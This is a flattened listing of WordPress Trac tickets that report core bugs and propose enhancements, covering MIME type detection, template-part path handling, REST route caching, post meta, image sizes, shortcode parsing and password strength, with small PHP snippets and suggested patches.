Awaiting Review defect (bug) new dev-feedback 2018-12-17T09:41:57Z 2019-01-09T23:07:37Z "Getting different REAL MIME type from function `finfo_file`. The issue maybe the different Operating Systems or due to Different PHP versions. But, While debugging the issue, When I try to upload the XML on localhost I got the `text/xml` as a real MIME type and on live site its `application/xml`. Below is the debugging steps: File: `/wp-includes/functions.php` line 2346 {{{ // Validate files that didn't get validated during previous checks. if ( $type && ! $real_mime && extension_loaded( 'fileinfo' ) ) { $finfo = finfo_open( FILEINFO_MIME_TYPE ); $real_mime = finfo_file( $finfo, $file ); finfo_close( $finfo ); // @DEBUGGING... echo '<pre>'; var_dump( FILEINFO_MIME_TYPE ) . '<br/>'; var_dump( $finfo ) . '<br/>'; var_dump( $file ) . '<br/>'; var_dump( $real_mime ) . '<br/>'; wp_die(); }}} The output of the above code is below on LOCALHOST: - PHP: Version 7.2.4 - System: Windows NT M 6.3 build 9600 (Windows 8.1 Professional Edition) i586 {{{ int(16) resource(767) of type (Unknown) string(46) ""C:\Users\Yum\AppData\Local\Temp/wxr-LccAYF.tmp"" string(8) ""text/xml"" }}} But, It is different on the LIVE site. - PHP: Version 7.0.32-4+ubuntu16.04.1+deb.sury.org+1 - System: Linux ip-172-31-25-204 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 {{{ int(16) resource(747) of type (Unknown) string(19) ""/tmp/wxr-YNkiH5.tmp"" string(15) ""application/xml"" }}}" Mahesh901122 Future Releases 59954 Gets error 404 in preview page Editor 6.4 normal major defect (bug) new dev-feedback 2023-11-23T12:34:22Z 2023-12-01T22:20:07Z "In latest version of WordPress 6.4.1, we get error 404. It redirects to a undefined page. For example link preview: /wp-admin/post.php?post=34891&action=edit Gets: /wp-admin/undefined We are using Classic Theme (GeneratePress) and we've tried with latest version of Gutenberg. But we have tried without plugins and other Theme like Twentytwenty four." davidperez Future Releases 57131 get_the_terms(): Parameter #1 ($post) of type is nullable. Taxonomy 3.6 normal normal Awaiting Review enhancement new dev-feedback 2022-11-17T04:26:34Z 2022-11-18T01:23:45Z "Follow-up to [24616]. From documentation on the return value of `get_the_terms()`, and the usage of `get_the_category()`, it may be assumed that this function may be used in the following manner. {{{#!php <?php $term = get_the_terms( null, 'category' ); }}}" omaeyusuke Future Releases 15086 get_template_part() should let you specify a directory westi* Themes 3.0 normal normal enhancement accepted needs-unit-tests 2010-10-10T21:36:45Z 2019-06-04T21:06:02Z "IT would be nice for `get_template_part()` to allow you to specify a directory to look for a file in. Right now you actually *can* do this, but it requires passing a 'slug' to the function like `directory/slug`. Since everywhere else in the code slugs are sanitized, this seems like an unexpected way to allow this functionality (I didn't realize this worked until @nacin pointed it out). Since this slug isn't actually sanitized at all, you can currently do `get_template_part( '../../../test' );` which seems rather unsafe (`get_template_part` should be able to include from outside the themes directory). I suggest sanitizing $slug and adding a third [optional] parameter that allows you to specify the directory to look in. The directory parameter should be sanitized enough to not allow it to start with a . or a / (although this more likely belongs in `locate_template()` as something done to $template_name inside the foreach). What does everyone think about this approach? How many themes do we think are currently using the $slug parameter to specify a directory? Right now the optional $name parameter is set up as a fall through, so if $slug-$name.php doesn't exist $slug.php is used. Should $directory be set up similarly ($directory/$slug-$name.php -> $directory/$slug.php -> $slug-$name.php -> $slug.php)?" aaroncampbell Future Releases 39473 get_routes() called multiple times within single REST request causing the rest_endpoints() filter to also fire more than once REST API 4.4 normal normal Awaiting Review enhancement new needs-unit-tests 2017-01-04T21:59:38Z 2023-01-19T23:28:07Z "Hi all, Many thanks for creating the REST API, and also for getting it into core! :) When I had a closer look at how to integrate this in our projects I noticed something peculiar with the rest_endpoints() filter: it is called multiple times over; in some cases twice, in others three times. So I did a little digging around and found that the root cause seemed to be the use of get_routes() at multiple locations: - in the rest_pre_dispatch filter (rest_handle_options_request) - in the rest_post_dispatch filter (rest_send_allow_header) - in the dispatch() itself - in the get_index() method - in the get_namespace_index() method After looking how these locations interact with each other, I couldn't detect any code which altered the generated route map between consecutive calls to get_routes(). I will add a patch in which I propose to store the generated route map in the class, and re-use that one instead of generating yet again the same array (and also re-filtering the same array). Since the name 'endpoints' is already taken, and being used in the initialization as well, I thought it would be prune to use another variable name: $route_map, which is also being used in the current doc-block. I did not profile this patch (not really sure how to do that), so I'm not sure if storing this rather large associative array is a good thing to do. However generating it multiple times (and re-filtering it also) may also be quite 'expensive'. Thanks, Ruud " ruud@… Future Releases 45273 get_postmeta: Inconsistent behavior of the 'single'-argument Options, Meta APIs normal normal Awaiting Review defect (bug) new dev-feedback 2018-11-03T19:29:48Z 2019-01-16T22:58:54Z "The phpdoc of the ''get_postmeta''-function in meta.php mentions that the ''single''-argument has no effect if ''meta_key'' is not specified. This is not true when the ''get_{$meta_type}_metadata''-filter is used. If this filter returns an array and ''single'' is true only the first item of the array is returned. This not the expected behavior when ''meta_key'' is empty. In my opinion this part: {{{#!php $check = apply_filters( ""get_{$meta_type}_metadata"", null, $object_id, $meta_key, $single ); if ( null !== $check ) { if ( $single && is_array( $check ) ) { return $check[0]; } else { return $check; } } }}} should be replace by: {{{#!php $check = apply_filters( ""get_{$meta_type}_metadata"", null, $object_id, $meta_key, $single ); if ( null !== $check ) { if ( $meta_key && $single && is_array( $check ) ) { return $check[0]; } else { return $check; } } }}} (Notice how I added {{{$meta_key && }}}) NOTE: This is a breaking change in the rare occasion that ''get_{$meta_type}_metadata''-filter is used in combination with an empty ''meta_key'' and ''single'' == true. If a fix is not desired; phpdoc must be changed to document this inconsistent behavior. " josk79 Future Releases 49478 get_post_type_object has the wrong type of validator for its parameter Posts, Post Types 5.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2020-02-19T18:43:03Z 2020-02-19T20:08:32Z "https://core.trac.wordpress.org/browser/tags/5.3/src/wp-includes/post.php?rev=46727#L1228 get_post_type_object expects a post type as a string as its parameter, however it checks if the parameter is scalar or not and returns null if it is not a number." kamilkecki Future Releases 20853 get_post_custom show directly serialized data from the post_meta arrays. Options, Meta APIs 1.5 normal normal defect (bug) assigned dev-feedback 2012-06-06T05:39:23Z 2019-06-04T20:43:13Z "get_post_custom show directly serialized data from the post_meta arrays. For example: If I save a data with: {{{ update_post_meta( $post_id, 'camp', array( 'some' => $var, 'thing' => $var_2 ) ); }}} When I use get_post_meta(); : {{{ $var_get = get_post_meta($post_id, 'camp', true); echo $var_get['some']; // Fine.. Print: $var content. }}} but, when I use get_post_custom() : {{{ $var = get_post_custom($post_id); echo $var['some']; Metod, (Not work because ""Returns a multidimensional array"" with all values, and 0 is the first or the unique value). echo $var['some'][0]; /* Metod, >:( , Not work. Print: a:2:{i:some;s:4:""this"";i:thing;s:7:""content"";} */ }}} Instead of display ""array"", and can not handle sub arrays." shadowhck Future Releases 17374 get_pages() with child_of forgets sort DrewAPicture Posts, Post Types 3.1.2 normal normal defect (bug) assigned dev-feedback 2011-05-11T10:06:17Z 2023-04-18T12:45:36Z "If you call {{{get_pages()}}} with both the {{{child_of}}} and {{{sort_column}}}, the sorting is not applied. {{{child_of}}} makes it select all pages (sorted) and later applies a subselect via {{{get_page_children()}}}. This subselect can mess up the sort order. An example was reported on http://wordpress.stackexchange.com/questions/16921/get-pages-not-ordering-as-it-should Related: #12821" janfabry Future Releases 8107 get_next_post, get_previous_post do not work for posts posted within same second Posts, Post Types 2.7 normal normal Future Release defect (bug) new dev-feedback 2008-11-08T12:34:22Z 2018-12-09T21:00:15Z "if you have posts that are published shortly one after the other (e.g. through a script or plugin that posts several posts at once) several of them may end up having the same post_date in the wordpress database table. this is due to the fact that mysql datetime seems to only maintain a precision of one second (see also this discussion: http://bugs.mysql.com/bug.php?id=8523). the problem now is that wordpress functions like get_next_post/get_previous_post (get_adjacent_post resp.) will no longer work correctly if something like this happens as they solely rely on a comparison of the post_date field and they don't treat the case where these timestamps are the same for several posts. the result is that e.g. get_next_post will pick one of the posts having the same timestamp and ""jump"" over the others, so the user will never see them. i see two possibilities around this 1.) treat cases with the same post_date by e.g. looking also at the post id (assuming it is always strictly increasing) or probably preferably 2.) make sure that no two posts have the same post_date timestamp by e.g. increasing post_date artificially when publishing the post and if another post already has the same timestamp. " whoismanu Future Releases 18947 get_intermediate_image_sizes() should also contain width/height/crop values as sub array Media 3.2.1 normal normal Future Release enhancement assigned dev-feedback 2011-10-14T14:48:05Z 2020-01-05T03:57:42Z "Currently the function [http://core.trac.wordpress.org/browser/branches/3.2/wp-includes/media.php#L580 get_intermediate_image_sizes()] only displays a combined list of built-in/default & (via {{{add_image_size()}}}) registered image size ''names''. In lot's of cases it would be pretty handy to also have the height, width & crop values attached as sub array as you can see it in {{{$GLOBALS['_wp_additional_image_sizes']}}}. ''I currently do not have a working dev version of wp installed, so I put it here as plain code:'' Change for [http://core.trac.wordpress.org/browser/branches/3.2/wp-includes/media.php#L580 get_intermediate_image_sizes()]: {{{ function get_intermediate_image_sizes() { global $_wp_additional_image_sizes; $image_sizes = array('thumbnail', 'medium', 'large'); // Standard sizes foreach ( $image_sizes as $size ) { $image_sizes[ $size ]['width'] = intval( get_option( ""{$size}_size_w"") ); $image_sizes[ $size ]['height'] = intval( get_option( ""{$size}_size_h"") ); // Crop false per default if not set $image_sizes[ $size ]['crop'] = get_option( ""{$size}_crop"" ) ? get_option( ""{$size}_crop"" ) : false; } if ( isset( $_wp_additional_image_sizes ) && count( $_wp_additional_image_sizes ) ) $image_sizes = array_merge( $image_sizes, $_wp_additional_image_sizes ); return apply_filters( 'intermediate_image_sizes', $image_sizes ); } }}} The only two other affected lines in core are pretty a simple fix: Use the {{{array_keys()}}} only: [http://core.trac.wordpress.org/browser/branches/3.2/wp-admin/includes/image.php#L106 wp_generate_attachment_metadata()] and [http://core.trac.wordpress.org/browser/branches/3.2/wp-includes/post.php#L3824 wp_delete_attachment()]: {{{ foreach ( array_keys( get_intermediate_image_sizes() ) as $s ) { }}} I'm not really shure how the {{{crop}}} works, so this could maybe add additional DB calls if the option wasn't set - currently I only see {{{thumbnail_crop}}} added to the autoloaded options. ''The links are to the 3.2 branch of the repo.''" F J Kaiser Future Releases 52575 "get_home_path() returns ""/"" instead of path to WordPress directory" Filesystem API 5.6.1 normal major Awaiting Review defect (bug) new dev-feedback 2021-02-19T12:28:50Z 2023-07-18T01:34:51Z "Wrong return value from get_home_path() in /wp-admin/includes/file.php [https://developer.wordpress.org/reference/functions/get_home_path/] Expected result: Absolute filesystem path to the root of the WordPress installation Result in situation below: / **Context** A WordPress in its own directory installed according method II mentioned here https://wordpress.org/support/article/giving-wordpress-its-own-directory/ **Settings** (Example) Wordpress: https://pixellogik.de/wp Website: https://pixellogik.de Plugin WP-SCSS installed **Reproduce** Open https://pixellogik.de in a browser The plugin calls get_home_path() in enqueue_files() in line 213 /www/htdocs/w012345/pixellogik.de/wp/wp-content/plugins/wp-scss/class/class-wp-scss.php Due to the unexpected value ""/"" of get_home_path() the URL of the generated CSS file does not point to a file. The CSS won't be loaded, the site looks scrambled. **What went wrong?** If SCRIPT_FILENAME is outside the installation directory, the directory can't be found. This case is not handled, hence value ""/"" is returned **Possible fix:** return ABSPATH in that case" pixellogik Future Releases 35859 get_edit_user_link should always return the edit user link even if the given ID is that of the current user Users normal normal defect (bug) new dev-feedback 2016-02-18T11:18:13Z 2019-06-05T06:43:31Z "In my scenario a user action triggers an email that is sent to the site admin that contains a link to edit that users profile. When I'm using the function as follows {{{#!php <?php wp_mail( get_option('admin_email'), 'User needs help', get_edit_user_link( get_current_user_id() ) ); }}} the email only contains a link to http://example.com/wp-admin/profile.php which of course isn't very helpful in that context. The expected behavior to me is that the URL returned is always pointing to that specific user that I used as a function argument and I can use the link in any context: http://example.com/wp-admin/user-edit.php?user_id=19" jancbeck Future Releases 43792 get_comment_excerpt filter should tell if the comment was shorted or not Comments normal normal Awaiting Review enhancement new dev-feedback 2018-04-17T22:14:58Z 2019-01-16T06:50:09Z "The design I am currently working on has long comments shortened to 100 words, and a 'show more' / 'show less' link is added. I only want to add the 'show more' text if the comment has been shortened. There is a filter before get_comment_excerpt() returns that I can use to add my link. However it does not pass along information about whether or not the comment was shortened. As a workaround I can check if the comment ends in ""…"", but it would make sense to add a boolean value to the filter arguments to make this easier/cleaner." mattkeys Future Releases 57269 Get site URL from config instead of the database Upgrade/Install normal normal Awaiting Review enhancement new close 2022-12-03T18:27:22Z 2022-12-05T14:44:09Z "a big problem is facing everyone trying to move a site between two hosting or between two environments like (staging and production ) the most frequent problem is the site URL and the internal links and if you have extensive databases it will be your nightmare so it creates issues and limits our flexibility so what I suggest is to set the site and home URLs from the wp-config.php file like `define( 'SITEURL', 'https://mywebsite.com' );` I know it is not very simple, especially with multi-sites but it deserves I also tried {{{ define( 'WP_HOME', 'http://example.com' ); define( 'WP_SITEURL', 'http://example.com' ); }}} but if you don't have 'siteurl' option on your site it will give you 'Error establishing a database connection' in the front end and 'One or more database tables are unavailable. The database may need to be repaired.' which even not the clear error message die to `wp-includes/functions.php => function is_blog_installed` I can work on this point but before I spend time, I need approval from the WordPress team that they will accept such modification or that not be accepted " mhmdyassin07 Future Releases 42218 General Settings: Description of Email address should be Email Address instead of just Address. Administration normal normal Awaiting Review enhancement new dev-feedback 2017-10-14T10:47:03Z 2017-10-16T09:54:53Z "In General Setting, There is currently ""Address"" only used for description of Email Address. It should be ""Email Address"", so it won't be confused to people differentiate ""Address"" and ""Email Address"". (Tested in Version 4.9-beta2-41852)" chetan200891 Future Releases 39824 Gallery doesn't show images being uploaded adamsilverstein Gallery 4.0 normal normal Future Release defect (bug) assigned dev-feedback 2017-02-09T16:18:43Z 2021-02-17T07:21:08Z "When you insert a gallery with images being uploaded in Edit Post page, the gallery doesn't show the images. '''How to Reproduce''' 1. Open Edit Post page. 2. Insert a gallery with one uploaded image. 3. Select the gallery in tinyMCE then click on Edit. 4. Upload a big image file and/or slow down the internet to buy time for the following actions. 5. Choose Edit Gallery tab then click on Update Gallery button while the big image is uploading. 6. The gallery shows an empty element instead of the image. 7. If you edit the gallery and open Edit Gallery tab after the image uploaded, you'll see it has gone." gonom9 Future Releases 40779 function_exists() audit in wp-db.php Database low minor Awaiting Review defect (bug) new dev-feedback 2017-05-16T14:47:06Z 2021-06-01T12:50:59Z "A few `function_exists()` checks can be removed from `wp-db.php`, thanks to recent load order changes, probably nobody having looked in a while, and generally being afraid to break DB drop-ins: All of these functions are in files now loaded ahead of `require_wp_db()`: * `is_multisite` (load.php) * `_deprecated_function` (functions.php) * `mb_strlen` (compat.php) Bonus: * `mb_check_encoding()` could *maybe* be a new function in compat.php (it's used 3 times in core, using `@` or `function_exists`) ---- The only caveats are the installation process, and 10+ year-old HyperDB versions that do the old-school deep-integration thing, of directly including files – they'll need extra scrutiny." johnjamesjacoby Future Releases 57507 function wp_unique_post_slug inconsistent for numerical page slugs, e.g. 404 Posts, Post Types 6.1.1 normal minor Awaiting Review defect (bug) new dev-feedback 2023-01-19T11:03:36Z 2023-01-19T11:03:36Z " {{{ if ( $post_name_check || in_array( $slug, $feeds, true ) || 'embed' === $slug || preg_match( ""@^($wp_rewrite->pagination_base)?\d+$@"", $slug ) || $is_bad_hierarchical_slug ) }}} Will always return true for preg_match as long as 'page' is optional and it is a numerical slug, e.g. 404 {{{ preg_match( ""@^($wp_rewrite->pagination_base)?\d+$@"", $slug ) preg_match( ""@^(page)?\d+$, 404"") => 1 }}} Assuming pagination is the point for this check, a possible solution could be to check if post pagination navigation exists first. {{{#!php $pagination_based = get_the_post_navigation() ? preg_match( ""@^($wp_rewrite->pagination_base)?\d+$@"", $slug ) : false; if ( $post_name_check || in_array( $slug, $feeds, true ) || 'embed' === $slug || pagination_based || $is_bad_hierarchical_slug ) }}} Suggestion: Either allow numerical slugs if it does not interfere with paginations, or disallow it with a warning. " arve5 Future Releases 35561 function wp_admin_canonical_url() not using configured site url when constructing canonical url link tag Administration 4.4.1 normal normal Awaiting Review defect (bug) new dev-feedback 2016-01-21T16:00:36Z 2023-10-05T08:26:19Z "I was having an issue with the wp_admin_canonical_url() function in wp-admin/includes/misc.php and I have a suggested fix I am running word press behind a reverse nginx proxy on a different box so my main site is at http://www.rammount.com and the blog is at http://www.rammount.com/blog The blog url is set in the WordPress configuration. But when you log into the admin section the wp_admin_canonical_url() function does not pick up the configured url instead it constructs the url without the /blog. This of course breaks links in the admin section, constantly redirecting things to http://www.rammount.com without the /blog by changing the following line: `$current_url = set_url_scheme( 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] );` to: `$current_url = set_url_scheme(home_url(add_query_arg(array(),$wp->request)) . $_SERVER['REQUEST_URI']);` the problem is solved. the proper url is created and as such the links in the admin section that use the canonical url link function correctly. Hoping to have this change evaluated for inclusion, so that I don't have to remake this edit every time one of my designers updates the WordPress installation?" ilude Future Releases 47730 Function plugins_api is not triggered for non wp-marketplace plugins Plugins 5.2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2019-07-18T07:32:17Z 2019-08-23T07:28:43Z "I currently try to setup a private-hosted repository for my own plugins / themes and tried to do that with the filter hooks in the plugin-install.php file - the documentation of it indicates that this should be possible, even on the latest version (5.2.2). I activated my own plugin on my bedrock (https://roots.io/bedrock/) setup and following the tutorial https://rudrastyh.com/wordpress/self-hosted-plugin-update.html#comments i tried to implement the update mechanism. I think while doing that i stumbled upon a bug that causes wordpress to not trigger the plugins_api method at all - i can hook into the ""site_transient_update_plugins"" filter to display the update-badge next to the plugins navbar item but the update text / button and show-details button for my plugins wont show up." marthm Future Releases 43015 function get_previous_comments_link not working in front page Comments 4.9.1 normal normal Awaiting Review defect (bug) new dev-feedback 2018-01-03T11:44:16Z 2019-06-24T16:29:01Z "Hey, function get_previous_comments_link generate wrong url in front page, but it's ok in typical page, it's because of the permalink, wordpress hasn't full permalink in front page." devlife Future Releases 26868 Function 'make_clickable()' doesn't make hyperlinks from explicit URLs using the `mailto:`, `tel:` and other schemes that do not start with `//` Formatting 3.8 normal normal enhancement new needs-unit-tests 2014-01-18T16:00:14Z 2019-06-04T19:45:21Z "Function `make_clickable()` tries to recognise URLs and convert these into clickable hyperlinks. The function is by default configured as a filter for comment text. Unfortunately, the function assumes that all explicitly declared URLs begin with the string `//` after the scheme and colon parts which is not the case for the `mailto:`, `tel:` and many other schemes. Such URLs could usefully be made clickable, especially for use on smartphones and tablets. This also leads to inconsistencies between explicitly and implicitly declared URLs. For example, the string `myemail@mydomain.com` is converted into a clickable hyperlink whilst the string `mailto:myemail@mydomain.com` is not. By contrast, the TinyMCE post editor correctly and automatically makes both implicit and explicit `mailto:` links clickable but does nothing with `tel:`. For reference, the syntax of URLs is defined by http://tools.ietf.org/html/std66, the `mailto:` scheme by http://tools.ietf.org/html/rfc6068 and that for `tel:` by http://tools.ietf.org/html/rfc3966. As #16892 has illustrated, parsing URLs can be hard. The use of `wp_allowed_protocols()` may help in detecting which strings we wish to make clickable. Found whilst testing #22946." mdgl Future Releases 51769 Full-text search support Database normal normal Awaiting Review enhancement new dev-feedback 2020-11-13T12:18:27Z 2022-08-16T12:16:23Z "Let's talk about first-class fulltext search support in WP core. Is there any reason not to support FULLTEXT search in WordPress core for newer MySQL versions with the current search mechanism serving as a fallback for older MySQL versions? MySQL supports FULLTEXT indexes for MyISAM tables since version 3.23.23 and for InnoDB tables since 5.6. As @TimothyBlynJacobs noted, WordPress supports versions back to MySQL 5.0: https://github.com/WordPress/wordpress-develop/blob/master/src/wp-includes/version.php src/wp-includes/version.php As @desrosj noted: * The recommended versions are MySQL >= 5.6/MariaDB >= 10.1 as per https://wordpress.org/download/. * According to the WordPress stats page, a considerable amount of sites use MySQL 5.5 (35%), and some still use 5.1/5,0. Raising support to >= 5.6 is not really an option. The last discussion about that feature I found was from 10 years ago so maybe it's good time to re-evaluate: https://core.trac.wordpress.org/ticket/14722 " zieladam Future Releases 59767 Front page template selection needs to be more granular Themes normal normal Future Release enhancement new dev-feedback 2023-10-30T15:47:30Z 2024-02-02T10:26:01Z "While #59759 has been focused on a concern with the TT4 `home.html` template, the reason why it came up as a problem in the first place is because TT4 chose to use the `home.html` template for the front page. That shouldn't be the case, but whichever path a block theme takes, there is no appropriate solution for the problem. Here's why: * If you have only a `home.html` template, it won't be used for the static front page. * If you have a `front-page.html` template and a `home.html` template, the `front-page.html` template will be used for the front page regardless of whether it is configured to display a static front page or the blog. This was fine when we were using classic themes, as those themes would simply include a `if ( is_home() ) { /* Show blog posts. */ } else { /* Show static page content. */ }` in their PHP `front-page.php` template. But you can't do that in block theme templates, so we'll need a more appropriate solution. You ''cannot'' achieve this in block themes at the moment. That's why this is a bug ticket more than an enhancement. I think there is a rather straightforward way to solve this problem for block themes, while also providing the same additional flexibility for classic theme templates: * For the front page, WordPress core should support an additional layer of templates, either `front-page-home` or `front-page-static` (depending on whether the home page is configured to show the blog or a static page). * Block themes could then provide `front-page-home.html`, `front-page-static.html`, and `home.html`, and thus would have the ability to cater for all 3 types of content. * Existing block themes wouldn't have any problem though, as in case `front-page-home.html` / `front-page-static.html` aren't present, WordPress core would still load `front-page.html`. * For classic themes, it wouldn't change much, just that they would now ''optionally'' be able to split their `front-page.php` template into two more distinct `front-page-home.php` and `front-page-static.php` templates. Of course the `home` and `static` suffixes for the new `front-page-*` templates were just my initial ideas, there may be better names for those. My thinking behind those names is that `home` is aligned with the existing `home.html` (which is for better or worse synonymous with the blog in WordPress, e.g. `is_home()` returns true when on the blog page), while `static` simply describes the option of choosing a static page. Maybe `blog` would be more descriptive than `home`? Curious to hear others' thoughts." flixos90 Future Releases 44043 Framework for logging/retrieving a users consent state Privacy normal normal Future Release enhancement new dev-feedback 2018-05-11T09:33:28Z 2020-11-26T09:21:03Z When a users visits a website for the first time, the user should be able to opt in or out from cookies. There are a couple of WP plugins that provide such functionality. The most common cookie categories are; necessary, preference, statistics, marketing. Other plugins should be able to retrieve the users consent state through WP Core, which allows them to avoid putting unwanted cookies in the users browser, without having to explicitly support certain cookie consent plugins. cookiebot Future Releases 38557 Format for registering a default header image is ambiguous joemcgill* Themes normal normal Future Release defect (bug) accepted dev-feedback 2016-10-28T23:33:02Z 2019-03-26T13:16:14Z "When registering a custom header with a default image, most resources seem to recommend using an absolute URL ([https://developer.wordpress.org/themes/functionality/custom-headers/ Handbook], [https://codex.wordpress.org/Custom_Headers Codex], [https://make.wordpress.org/themes/2012/04/06/updating-custom-backgrounds-and-custom-headers-for-wordpress-3-4/ Make post]). However, it can be registered with `sprintf` placeholders, which is what the old `HEADER_IMAGE` [https://themes.trac.wordpress.org/browser/twentyten/1.0.3/functions.php#L106 constant accepted]. It's registered that way in [https://themes.trac.wordpress.org/browser/twentythirteen/2.0/inc/custom-header.php#L27 Twenty Thirteen] as well. Any time core references the default image URL, it needs to account for the replacements. The problem is it doesn't take this into consideration in at least a couple places and obscures the replacement a bit by passing the default string through `get_theme_mod()` in some cases, which handles the replacement itself. Here are a couple of places where the replacement isn't handled in core: * [https://github.com/WordPress/WordPress/blob/f7552bbf53c183753eb8ac0e723f79e0d98260ae/wp-includes/class-wp-customize-manager.php#L3438 wp-includes/class-wp-customize-manager.php] * [https://github.com/WordPress/WordPress/blob/f7552bbf53c183753eb8ac0e723f79e0d98260ae/wp-admin/custom-header.php#L642-L643 wp-admin/custom-header.php] To see how this manifests itself: 1. Switch to Twenty Ten or Twenty Thirteen 2. Delete the `header_image` and `header_image_data` theme mods 3. Access the Customizer 4. Open the Header Image section In either theme, the default image that was visible on the front end is missing in the Customizer preview and the ""Current header"" control doesn't show an image as being set. If you access the old Custom Header screen in the admin panel (wp-admin/themes.php?page=custom-header), the option to reset the image is visible when it shouldn't be. I imagine this also affects default images for the custom background feature as well." bradyvercher Future Releases 57262 force_ssl_admin can be set to return a string General normal normal Awaiting Review defect (bug) new dev-feedback 2022-12-02T20:57:03Z 2022-12-14T23:15:55Z "See these tests $this->assertTrue( force_ssl_admin( 'a string' ), 'set true' ); $this->assertSame( 'a string', force_ssl_admin(), 'check is still true' ); I will add a check that Bool is passed in not string" pbearne Future Releases 35817 Force users to set strong passwords Login and Registration normal normal Awaiting Review enhancement new close 2016-02-12T16:31:38Z 2024-02-08T15:55:49Z "WordPress 4.3 added [https://github.com/dropbox/zxcvbn zxcvbn] for better password strength testing. The UI was also modified to push users to set strong passwords in various ways. * When setting a password, a strong one is generated for the user. * A user must check off an ""Are You Sure?"" checkbox to set a weak password. This is great. However, an ""Are You Sure"" checkbox is what stands between an easily hackable WordPress site and an exponentially stronger WordPress site. I would like to force users to set strong passwords in the UI. " ericlewis Future Releases 49632 Force lowercase for taxonomy id in register_taxonomy() Taxonomy normal normal Awaiting Review enhancement new dev-feedback 2020-03-12T15:07:46Z 2020-03-12T15:15:41Z "Hello all, To avoid conflict, I think https://developer.wordpress.org/reference/functions/register_taxonomy/ should mention that $taxonomy must be declared in lowercase. Should it be a good idea to strtolower() the key ? What do you think ? " sebastienserre Future Releases 47526 Flagging system needed to help flush rewrite rules on post type registration from a plugin Rewrite Rules 5.2.1 normal normal Awaiting Review feature request new dev-feedback 2019-06-11T16:31:51Z 2019-07-11T21:59:40Z "When activating or deactivating a plugin with post types or taxonomies the timing of flushing rewrite rules is very cumbersome. There are also inconsistencies on how flushing rewrite rules ""should"" be handled when activating vs deactivating. Further, some plugins remove the rewrite rules added for a post type by other plugins. I think it is worth considering the implementation of a unified API for flushing rewrite rules to help plugin developers flush permalinks registering with post types and taxonomies. I believe a good starting point would be to add a flagging system to the database. The flagging system would allow authors to check for the flag and execute code when the flag is available. This seems to be a common practice already. Example implementation: {{{#!php <?php // Plugin Name: My Plugin add_action( 'init', function() { register_post_type('book', ['public' => true]); }); function my_plugin_activate() { update_site_state_changed( 'flush_rewrite_rules' ); } function my_plugin_deactivate() { update_site_state_changed( 'flush_rewrite_rules' ); } register_activation_hook(__FILE__, 'my_plugin_activate'); register_deactivation_hook(__FILE__, 'my_plugin_deactivate'); }}} The applied patch is for proof of concept. Not intended to be final. " kevindees Future Releases 47752 Fix upload of .srt files Upload 5.0.1 normal normal Future Release defect (bug) new dev-feedback 2019-07-22T08:19:27Z 2019-09-22T21:49:24Z "See #45615, #45622, [44438], [44439], and [44443]. Files with `.srt` extension are meant for video subtitles (captions), much like `.vtt` files. After the changes to make the mime type check stricter in WordPress 5.0.1 (backported to 4.9.9, etc.), uploading `.srt` files can fail because of mismatched MIME type check. Actually, `.vtt` can be served as `text/plain` depending on the server configuration. Before WordPress 5.0.2, `.srt` files could be uploaded without issues. For example, on a standard VVV install, the upload fails. Test file from the `mediaelement-files` GitHub repo: https://github.com/mediaelement/mediaelement-files/blob/master/mediaelement.srt " afercia Future Releases 57879 fix rest_get_endpoint_args_for_schema() to allow user-defined sanitize and validate callbacks. REST API 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2023-03-07T07:19:39Z 2023-03-08T14:46:59Z `rest_get_endpoint_args_for_schema()` doesn't allow user-defined validation and sanitize callbacks. It always uses `rest_validate_request_arg` and `rest_sanitize_request_arg` functions to validate and sanitize. This ticket fixes this. mi5t4n Future Releases 43476 Fix parentheses in post status links for RTL Administration normal normal Awaiting Review defect (bug) new dev-feedback 2018-03-06T11:07:18Z 2018-03-06T13:28:33Z "When switching to a RTL language, the parentheses in the post status links can become mixed up, when the status is not translated. '''How to replicate the issue?''' Switch to e.g. the ''Azərbaycan dili'' language that is missing the ''Draft'' post status translation. '''Where to see the issue?:''' Visit the {{{wp-admin/edit.php}}} and check out the parentheses in the ''Draft'' post status link. " birgire Future Releases 47863 Fix odd, unexpected output from shortcode_parse_attts SergeyBiryukov Shortcodes normal normal Future Release defect (bug) reopened dev-feedback 2019-08-11T12:55:03Z 2020-02-24T20:50:33Z "When passing a full shortcode to this function, I'm expecting only an array of key/value attributes of the shortcode to be returned, however this is not the case. Basic example (though my diff of unit tests have many), this shortcode: `[unittest title=""unittest"" link=""https://unit.test/""]` will return an array that looks like this: {{{ ( 0 => '[unittest' 'title' => 'unittest' 1 => 'link=""https://unit.test/""]' ) }}} rather than one that looks like this {{{ ( 'title' => 'unittest' 'link' => 'https://unit.test/' ) }}} I've already created a patch for this. I will put it in two parts. First unit tests with a data provider of 6 unit test format examples. 5 out of 6 will fail. I will then include another patch that includes the unit tests plus the proposed fix to the function." mauteri Future Releases 48393 Fix from #38903 prevents options autoload parameter update SergeyBiryukov* Options, Meta APIs normal major Future Release enhancement accepted dev-feedback 2019-10-22T07:46:00Z 2023-08-28T21:00:43Z "This is a follow-up to #38903. 3 years ago fix for not * If the new and old values are the same, no need to update. * But this condition does not check if method call intention was to update autoload field of the option. Currently the issue can be resolved by force update options when update_option method is called with autoload != null and check * If the new and old values are the same, no need to update. * should be skipped." anonymized_16833402 Future Releases 46571 Fix contributors list in plugin information + duplicate CSS Plugins 5.2 normal normal Awaiting Review enhancement new dev-feedback 2019-03-20T08:28:07Z 2019-03-20T09:07:32Z I think the contributions list can be better with this change. mostafa.s1990 Future Releases 48842 Fix calculation error when resampling images before resizing in class-wp-image-editor-imagick.php Media 4.5 high normal Future Release defect (bug) new dev-feedback 2019-11-30T18:34:34Z 2020-10-15T14:23:17Z "Seems there is a calculation error when resampling large images before resizing them to a much smaller sub-size. Looking at #33642 and [36700], the idea is to efficiently reduce the size of the original image before resizing by using ImageMagick's `sampleImage()`. However in some cases the resampled image may be larger than the original. Caused by doing the resampling when the destination image is about 1/3 of the size of the original, and using a (hard-coded) `$sample_factor = 5`, see https://core.trac.wordpress.org/browser/tags/5.3/src/wp-includes/class-wp-image-editor-imagick.php#L333. Example: for an original image of 1000x500 and destination image of 300x150, the resampled source image will be 1500x750 (the `$resize_ratio` in this case is `0.09`)." azaozz Future Releases 58855 Fix and enhance wp_is_development_mode() to be able to return whether a development mode is beiung used General normal normal Future Release enhancement new dev-feedback 